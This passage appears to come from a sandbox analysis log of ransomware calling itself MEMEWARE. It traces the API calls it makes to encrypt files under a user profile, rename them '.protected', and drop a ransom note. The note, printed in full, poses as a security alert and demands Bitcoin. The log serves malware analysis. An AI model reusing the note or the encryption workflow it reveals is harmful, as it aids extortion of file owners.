dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.940] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0085.940] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".txt") returned 0x0 [0085.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0085.941] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".rar") returned 0x0 [0085.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 88 [0085.941] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".zip") returned 0x0 [0085.941] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1f2, lpOverlapped=0x0) returned 1 [0085.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.941] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f2, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1f2, lpOverlapped=0x0) returned 1 [0085.941] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.942] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.942] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.942] CloseHandle (hObject=0x150) returned 1 [0085.942] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.protected") returned 98 [0085.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.protected")) returned 1 [0085.943] FindNextFileW (in: 
hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Windows") returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Program Files") returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Program Files (x86)") returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="$Recycle.bin") returned 1 [0085.943] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="System Volume Information") returned 1 [0085.943] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0085.943] StrStrIW (lpFirst="WMSDKNS.XML", lpSrch=".protected") returned 0x0 [0085.943] lstrcmpW (lpString1="WMSDKNS.XML", lpString2="RESTORE_FILES.txt") returned 1 [0085.943] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.943] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0085.944] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".txt") returned 0x0 [0085.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0085.944] StrStrW 
(lpFirst="WMSDKNS.XML", lpSrch=".rar") returned 0x0 [0085.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0085.944] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".zip") returned 0x0 [0085.944] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x27cf, lpOverlapped=0x0) returned 1 [0085.954] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd831, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.954] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x27cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x27cf, lpOverlapped=0x0) returned 1 [0085.955] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.955] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.955] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.955] CloseHandle (hObject=0x150) returned 1 [0085.955] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.protected") returned 98 [0085.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.protected")) returned 1 [0085.956] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.956] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.956] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\RESTORE_FILES.txt") returned 94 [0085.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.958] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.958] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.959] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.959] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.959] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.959] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.959] CloseHandle (hObject=0x14c) returned 1 [0085.960] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.960] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.960] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\RESTORE_FILES.txt") returned 89 [0085.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.961] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.961] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.962] lstrlenA (lpString="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") returned 684 [0085.962] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.962] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.962] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.962] CloseHandle (hObject=0xd8) returned 1 [0085.963] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Windows") returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Program Files") returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Program Files (x86)") returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="$Recycle.bin") returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="System Volume Information") returned 1 [0085.963] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 73 [0085.963] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0085.963] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0085.963] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned 75 [0085.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.963] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.963] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.964] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.964] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.964] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.964] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\.") returned 75 [0085.964] lstrcmpW 
(lpString1=".", lpString2=".") returned 0 [0085.964] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.964] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.964] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.964] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.964] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.964] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.964] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\..") returned 76 [0085.964] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.964] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="Windows") returned -1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="Program Files") returned -1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="Program Files (x86)") returned -1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="$Recycle.bin") returned 1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="System Volume Information") returned -1 [0085.964] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 81 [0085.964] lstrcmpW (lpString1="Gadgets", lpString2=".") returned 1 [0085.964] lstrcmpW (lpString1="Gadgets", lpString2="..") returned 1 [0085.964] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned 83 [0085.964] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.965] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.965] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.965] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.965] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.965] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.965] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\.") returned 83 [0085.965] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.965] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.965] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.965] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.965] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.965] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.965] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.965] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\..") returned 84 [0085.965] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.965] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.965] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.965] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.965] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\RESTORE_FILES.txt") returned 99 [0085.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.966] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.966] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.967] lstrlenA (lpString="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") returned 684 [0085.967] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.967] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.967] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.967] CloseHandle (hObject=0x14c) returned 1 [0085.967] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="Windows") returned -1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="Program Files") returned 1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="Program Files (x86)") returned 1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="$Recycle.bin") returned 1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="System Volume Information") returned -1 [0085.967] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0085.967] StrStrIW (lpFirst="Settings.ini", lpSrch=".protected") returned 0x0 [0085.967] lstrcmpW (lpString1="Settings.ini", lpString2="RESTORE_FILES.txt") returned 1 [0085.967] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.967] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.968] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0085.968] StrStrW (lpFirst="Settings.ini", lpSrch=".txt") returned 0x0 [0085.968] lstrlenW 
